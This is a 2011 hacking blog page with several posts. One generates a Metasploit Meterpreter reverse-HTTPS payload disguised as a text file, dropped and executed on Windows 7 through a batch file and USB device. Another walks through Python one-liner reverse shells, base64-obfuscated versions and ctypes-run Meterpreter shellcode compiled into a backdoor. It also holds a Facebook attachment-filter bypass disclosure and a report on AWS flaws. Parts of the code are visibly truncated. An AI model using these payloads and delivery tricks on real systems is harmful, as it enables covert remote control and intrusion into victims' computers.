Oct 29, 2011

Executable text files

B y astr0baby Okay nothing new here, just a trick to load a text file which is in fact a win32 PE binary. I’ve come across an interesting article about Alternate Data Streams on this excellent blog : http://www.exploit-monday.com/2011/09/stealth-alternate-data-streams-and.html   and decided to utilize ADS in my exercise scenario in which we attack Win7 SP1 32bit.

I’ve written a custom Metasploit script generator which will create our files and put them in a ShellCode folder in the Metasploit directory. Again this should be placed in Metasploit root folder and made executable.
echo "************************************************************"
echo "           Automatic shellcode generator                    "
echo "                  By Astr0baby 2011                         "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
#echo "$IP"
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode  -X custom-templates/write.exe -e x86/shikata_ga_nai -c 6  -t exe  > Document.txt

if [ ! -d "$ShellCode" ]; then
mkdir ShellCode
mv Document.txt  ShellCode
upx -9 ShellCode/Document.txt
echo '@echo off' > ShellCode/run.bat
echo 'copy Document.txt C:\ProgramData\Micorosft\DeviceSync\' >> ShellCode/run.bat
echo 'wmic process call create \\.\C:\ProgramData\Microsoft\DeviceSync\Document.txt' >> ShellCode/run.bat
echo 'exit' >> ShellCode/run.bat
todos ShellCode/run.bat
echo "--------------------------------------------------------------------------"
echo "run.bat and Document.txt created in ShellCode folder, ready for deployment"
echo "--------------------------------------------------------------------------"

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate2 explorer.exe'  E
Please note that in this script a custom executable template folder is called custom-templates in the root Metasploit folder where the template executables are. Again use your own. The Payload is then packed using upx packer to make it fit onto Teensy. Also I am using a different migrate2.rb meterpreter script as the latest one cannot automigrate to process name given, only to given process ID which we obviously  do not know.  So here it is
# $Id: migrate.rb 10277 2010-09-09 16:09:27Z darkoperator $
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.

spawn = false
target = nil

opts = Rex::Parser::Arguments.new(
        "-h" => [ false,"Help menu." ],
        "-f" => [ false, "Launch a process and migrate into the new process"]
opts.parse(args) { |opt, idx, val|
        case opt
        when "-f"
                spawn = true
        when "-h"
                print_line("USAGE:   run migrate [process name]")
                print_line("EXAMPLE: run migrate explorer.exe")
                raise Rex::Script::Completed
                target = val

if client.platform =~ /win32|win64/
        server = client.sys.process.open

        print_status("Current server process: #{server.name} (#{server.pid})")

        target_pid = nil

        if ! spawn
                # Get the target process name
                target ||= "lsass.exe"
                print_status("Migrating to #{target}...")

                # Get the target process pid
                target_pid = client.sys.process[target]

                if not target_pid
                        print_error("Could not access the target process")
                        print_status("Spawning a notepad.exe host process...")
                        note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
                        target_pid = note.pid
                target ||= "notepad.exe"
                print_status("Spawning a #{target} host process...")
                newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
                target_pid = newproc.pid
                if not target_pid
                        print_error("Could not create a process around #{target}")
                        raise Rex::Script::Completed

        # Do the migration
        print_status("Migrating into process ID #{target_pid}")
        server = client.sys.process.open
        print_status("New server process: #{server.name} (#{server.pid})")

        print_error("This version of Meterpreter is not supported with this Script!")
        raise Rex::Script::Completed
We are using a default ACL weakness in Windows7 in this folder : C:\ProgramData\Microsoft\DeviceSync\    it has Full Control for everyone so its a perfect place to hide the payload.  There are many other places so search for yourself using the AccessEnum.exe from SysinternalsSuite.
The last part is pretty obvious. Execute the batch run.bat on the external usb somehow. This can be easily done by Teensy like I’ve demonstrated in the previous examples.
To sum it up we are executing Document.txt via wmic process create which was silently dropped into the C:\ProgramData\Microsoft\DeviceSync\  folder.

Source: https://astr0baby.wordpress.com/2011/10/27/executable-text-files/

If you like my blog, Please Donate Me

Oct 28, 2011

Facebook Attach EXE File Vulnerability

1. Summary:

When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment.

2. Description:

When attaching an executable file, Facebook will return an error message stating:

"Error Uploading: You cannot attach files of that type."


When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line:

Content-Disposition: form-data; name="attachment"; filename="cmd.exe"

It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not.

To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so:

filename="cmd.exe "


This was enough to trick the parser and allow our executable file to be attached and sent in a


3. Impact:

Potentially allow an attacker to compromise a victim’s computer system.

4. Affected Products:


5. Time Table:

09/30/2011 Reported Vulnerability to the Vendor
10/26/2011 Vendor Acknowledged Vulnerability
10/27/2011 Publicly Disclosed

6. Credits:

Discovered by Nathan Power


If you like my blog, Please Donate Me

Cloud Service of Amazon was hacked.

Until recently, a vulnerability in Amazon Web Services including the EC2 cloud allowed unauthorised users to perform administrative tasks. At an ACM workshop on cloud security, a team of researchers from Germany's Ruhr University of Bochum led by professor Jörg Schwenk reportedGerman language link that attackers were, for example, able to start and stop virtual machines, and create new images and gateways, in an EC2 instance.
In their presentation entitled "All Your Clouds are Belong to us", the researchers explained how an XML signature attackPDF can be used to manipulate SOAP messages in such a way that EC2 will consider them authentic and intact. This attack type was first described in 2005 and exploits the fact that signed partial XML documents continue to be considered as having been signed correctly even after having been modified.
Attackers can move the signed partial tree and then inject specially crafted elements in the original location. The attack is successful if an application's signature verification and XML interpretation are handled separately and if the specially crafted, unsigned code is executed after verification. Apparently, this was the case with Amazon's SOAP interface. The security researchers said that a similar vulnerability also existed in the open source Eucalyptus software for operating private cloud installations.
Amazon also proved vulnerable to cross-site scripting (XSS) attacks. The researchers found it particularly problematic that, once a user has successfully logged into the store, a session for the AWS cloud service is created automatically. They said that a successful XSS attack on the store could potentially be exploited to take over an AWS session; this can be done by injecting a few lines of suitable JavaScript code into the Amazon store and was also demonstrated by the researchers.
The security holes they described were closed immediately after the researchers informed the Amazon and Eucalyptus developers.
See also:

If you like my blog, Please Donate Me

Oct 24, 2011

Python One Line Shellcode

This post will summary from the PaulDotCom post. If you want to full detail, please go to the Source.

1. We will write the simple python reverse tcp connect shell
import socket

import subprocess 



while 1:

  p = subprocess.Popen(s.recv(1024),  shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

  s.send(p.stdout.read() + p.stderr.read())

2. Collapse all the code into one line with semicolon. But while loop cannot the same line with another block. So we will have 2 lines for the code. And we will collapse all into one with exec() function it's work like eval() of Javascript. So you must use "\n" for plus first line and second line.

2 Lines

import socket;import subprocess ;s=socket.socket() ;s.connect(("",9000)) 

while 1:  p = subprocess.Popen(s.recv(1024),  shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);  s.send(p.stdout.read() + p.stderr.read())
One Line

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('',9000))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

3. So if you setup netcat listener in port 9000(nc -l -p 9000), you will receive the shell.

4. If you want to encode  the source code to base64, you can do like this example.


Python 2.5.1 (r251:54863, May  5 2011, 18:37:34) 

[GCC 4.0.1 (Apple Inc. build 5465)] on darwin

Type "help", "copyright", "credits" or "license" for more information.

>>> shellcode="import socket, subprocess;s = socket.socket();s.connect(('',9000))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())"

>>> shellcode.encode("base64")

5. After you get base64, you can replace it into exec() and use .decode('base64'));

python -c "exec('aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgo\nJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJl\nY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJw\ncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJl\nYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkp\n'.decode('base64'))"
6. If you want to use Metasploit Shellcode, you can generate it with
>msfvenom -p windows/meterpreter/reverse_tcp L= -f c | tr -d '"' | tr -d '\n'

7. So if we use Metasploit Shellcode in Python, it's gonna be like this.
from ctypes import *

reverse_shell = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"

memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell))

shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p))


*** If you attack another OS, you must change the payload to match OS architecture.

8. Now we don't use any while loop we can collapse into 1 line without exec().

python -c "from ctypes import *;reverse_shell = \"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3
";memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell));shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p));shellcode()"

9. Before run the python shellcode, We must create the Metasploit Listener for receive connection.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST LHOST =>
msf exploit(handler) > exploit
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= E 
10. Have a good shell :)

*** If you want to compile this backdoor with pyinstaller with the following options:

$ python configure.py
$ python makespec.py --onefile --noconsole shell_template.py
$ python build.py shell_template\shell_template.spec


If you like my blog, Please Donate Me